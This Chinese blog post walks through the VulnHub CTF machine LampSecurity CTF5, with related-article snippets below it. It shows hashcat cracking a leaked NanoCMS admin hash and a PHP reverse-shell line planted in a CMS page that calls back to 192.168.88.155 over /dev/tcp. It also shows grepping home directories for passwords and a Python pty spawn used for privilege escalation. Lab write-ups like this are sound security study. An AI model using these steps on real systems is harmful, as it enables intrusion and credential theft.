LampSecurityCTF5

最新推荐文章于 2024-06-04 23:11:16 发布
最新推荐文章于 2024-06-04 23:11:16 发布
阅读量56 收藏
点赞数
文章标签: java 服务器 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58815063/article/details/132625044
版权

打开web页面

在web页面中发现了NanoCMS

searchsploit扫描cms

有一个0.4版本的远程代码执行,但需要凭据才可以执行。目前没有凭据还无法使用

在谷歌搜索nanocms0.4

发现存在信息泄露文件

发现其中存在账号密码

admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd"

破解一下密码

最可能为md5

使用hashcat破解

sudo hashcat -m 0 -a 0 9d2f75377ac0ab991d40c91fd27e52fd /usr/share/wordlists/rockyou.txt

md5破解为:shannon

在Admin login中尝试登录

登录成功。既然登陆成功,那之前的cms远程代码执行也可以利用

登录页面中存在新建页面

及本身的页面

 利用一下本身存在的页面,尝试对内容进行修改

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.88.155/1234 0>&1'");?>

 kali开启监听,运行代码尝试

建立成功!!

apache用户,权限很低,给的内容很有限。

用户很多,但给了bash环境能利用的很少

mysql虽然分配了bash环境但利用的可能性不大。cyrus是一个imap服务器利用可能性也不大。

用户比较多的情况下,提权就要考虑能不能在本机上搜索到历史记录

grep -R -i pass /home/* 2>/dev/null

-R:递归,一层一层去搜

-i:忽略大小写

/home/*:因为是用户所以在home目录下去搜索

2>/dev/null:因为当前用户权限不高,所以将错误信息扔掉

先搜索pass关键词,不合适再换其他的

这是我们登录nanocms用到的凭据

在最后发现了Patrick的note文件,用户也有bash环境,查看一下这个文件

发现存在50$cent

尝试提权但回显缺少tty终端,所以我们要给一个虚拟终端pty

python -c "import pty;pty.spawn('/bin/sh')"

输入密码提权成功!!!

kl37_dddan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
LAMPSECURITY CTF6.pdf
12-26
## LAMPSECURITY: CTF6 - ### About Release ... - **Name**: LAMPSecurity: CTF6 - **Date release**: 29 Jun 2009 ...Please remember that VulnHub is a free community resource so we are unable to check the ...
LAMPSecurityCTF5渗透测试流程
RemedyVI的博客
07-13 315
80端口可能有SQL注入,数据库为mysql版本大于5.0,可能获取user表信息登录cms后台或其余后台,php版本已知,可能有可利用漏洞,apache版本较老可能有漏洞,openssh版本较老可能有漏洞,操作系统为Linux。猜测该靶机思路:SQL注入->获取后台账户密码->登录后台->利用漏洞获取反弹shell->提权80 Apache httpd 2.2.6 ((Fedora)) (可能存在SQL注入)110 ipop3d 2006k.101 接收邮件。
红队靶机渗透-LAMPSecurity CTF5
m0_57967573的博客
05-02 5
有些用户在输入的时候,历史记录中可能会留下他的个人凭据。cat /etc/passwd 查看用户列表,初步观察,至少存在四个可利用账户 ······
Vulnhub靶机:LAMPSECURITY_ CTF5
LainWith的博客
12-23 1105
(此系列共5台)发布日期:2009年5月10日难度:初运行环境:VMware Workstation目标:取得 root 权限补充:解压下载得到的靶机,你会看到自带的一份官方攻略主机发现端口扫描+漏洞扫描敏感信息泄露cms挂马敏感信息提权。
红队笔记8-CTF5打靶流程-CMS漏洞-多用户信息泄露(vulnhub)
qq_63442530的博客
03-26 847
这次的靶场难度不高,但很需要经验,在提权过程中,把能有提权到尝试都去探索了一遍,发现都没有利用点,1.主机发现和端口扫描:端口扫描,发现存活了大量端口,其他很多端口不熟悉,依旧选择从80端口入手2.80端口:通过观察页面,发现是由NanoCMS搭建,存在后台登录窗口,根据想登录后台getshell的思路,寻找密码,最后在通过浏览器搜索到了NanoCMS的凭据泄露漏洞,成功登录后台。
Hack the LAMPSecurity: CTF 5 (CTF Challenge)
菜鸟耿耿
12-04 1526
Hack the LAMPSecurity: CTF 5 (CTF Challenge) 你好,朋友!今天,我们将面对另一个称为LAMPSecurity CTF5CTF挑战,这是为实践提供的另一个boot2root挑战,其安全级别适用于初学者。因此,让我们尝试突破它。但请注意,您可以先从这里下载 https://www.vulnhub.com/entry/lampsecurity-ctf5,84/ 下载完之后就开始我们今天的挑战啦~~ 实战演练 环境说明 kali IP:192.168.35.128 主机
【学渗透靶机——lampSecurityCTF4】
jieli0901227的博客
05-13 279
page=blog&title=Blog&id=2 地址存在注入。发现sudo - l 发现该账号sudo 可执行root 所有命令,并且不需要密码。2、使用 order by 判断数据库的列。5、查询user 表的字段信息。4、查询当前数据库有哪些表。3、使用联合注入找报错点。nmap 主机漏洞探测。扫描出也没什么有用信息。1、通过浏览页面发现。
LAMPSecurityCTF7靶机渗透测试流程
RemedyVI的博客
07-13 228
本次渗透通过8080端口SQL注入漏洞和文件上传漏洞获取反弹shell,通过敏感文件发现数据库账户和密码(密码为空)登录数据库,获取users表信息,然后解密哈希值,最后通过密码喷射登录到SSH,因为有sudo所有权限直接切换到root。
LAMPSecurityCTF4靶机渗透流程
RemedyVI的博客
07-11 196
碰巧能够登录SSH只能说运气比较好,但是实际渗透中这种情况很少,如果不是这样的话那这台靶机就不会是这么简单了。总轨发现了3个可登录的目录/admin/mail/restricted/,都可以用上面的用户中的一些或全部登录。一个关于数据库敏感信息/sql/sq.db,还有一些带有提示性的文件。内容为:一个日历目录看这个URL可能也是SQL注入或者是文件包含其中/admin可以发布blog,尝试向网页里写入一句话木马但是被过滤了,即使绕过过滤也没法执行。
红队靶机渗透-LAMPSecurityCTF4
m0_57967573的博客
04-30 366
通过端口扫描发现22,25,80三个端口,22端口是ssh,一般把它的攻击向量排得靠后。80端口是优先级最高的,最可能暴露出大量攻击面的。浏览web,发现blog页面存在sql注入,使用sqlmap自动化sql注入工具,得到了用户名及对应密码。使用sql注入得到的用户名密码尝试ssh登录,成功进入系统,sudo -l查看用户具有全部系统权限,/bin/bash启动一个新的进程直接提取至root用户。
红队打靶:LampSecurity:CTF5打靶思路详解(vulnhub)
Bossfrank的博客
06-20 851
本文是vulnhub靶机LampSecurity:CTF5的打靶思路详解,涉及的知识点包括到关于NanoCMS凭据泄露漏洞利用、历史记录凭据搜索等。靶机不难,但在寻找cms后台登录和提权的过程需要经验。
进阶2 探索图形化编程:扩展图形组件与切片开发的魅力
优树搭的博客
05-30 1534
当这些切片成功地通过图形程序串联起来后,在后续进行程序升级或维护时,大家会惊喜地发现,图形程序就如同清晰的路标一般,可以非常便捷地通过图形程序准确地定位到相关切片,并对这些切片进行在线查看、编辑和执行等操作。而且,这些切片的代码长度通常不会太长,相比传统开发的代码,阅读起来要容易得多,这无疑会给系统后续的工作带来极大的便利。
Java事务入门:从基础概念到初步实践
Huazie
05-29 1141
本文 Huazie 从 Java 事物的基础概念出发,带大家通过不同的事物管理方式进行实践,进一步加深了对 Java 事物的理解。
JavaScript第九讲:BOM编程
最新发布
星途码客的博客
06-04 758
今天星途给大家带来JavaScript倒数第二部分知识:BOM编程,希望对码客们有帮助。
Java 异常处理中try-catch块、finally子句以及自定义异常的使用
Itmastergo的博客
05-31 974
异常是程序运行过程中出现的非正常情况。Java 使用异常类(Exception 类及其子类)来表示这些异常情况。异常处理的核心思想是将正常的程序流程与异常处理流程分离开来,使代码更加清晰和可维护。Throwable 类:所有异常和错误的基类。Error 类:表示系统级的错误,程序通常无法处理,比如内存不足(OutOfMemoryError)。Exception 类:表示程序中可以处理的异常情况。RuntimeException 类。
Java手动启动jar包
liangweihao的博客
05-29 435
【代码】Java手动启动jar包。
java多线程创建方式
weixin_57763462的博客
05-28 1178
这种方式是通过创建一个实现了Runnable接口的类,并实现run()方法来创建线程。然后将这个类的对象作为参数传递给Thread类的构造器,并调用Thread对象的start()方法来启动线程。这种方式是通过创建一个实现了Callable接口的类,实现call()方法,并使用FutureTask或者ExecutorService来创建线程。这种方式的优点在于,由于Java不支持多重继承,如果你的类需要继承其他类,那么实现Runnable接口将是唯一的选择。// 在这里定义线程的执行逻辑。
Springboot vue3 elementplus 景点评论数据分析与可视化系统源码
scian22的博客
06-04 288
系统演示:链接:https://pan.baidu.com/s/1J056R4rYji_mc4gwteZEzg?
Redis学习笔记【基础篇】
qq_42192253的博客
05-30 1089
这样以来,我们就可以把不同类型的数据区分开了。从而避免了key的冲突问题。HSET key field value:添加或者修改hash类型key的field的值。获取sorted set 中的指定元素的排名:ZRANK key member。HGET key field:获取一个hash类型key的field的值。通过给key添加前缀加以区分,不过这个前缀不是随便加的,有一定的规范。HMSET:批量添加多个hash类型key的field的值。HMGET:批量获取多个hash类型key的field的值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值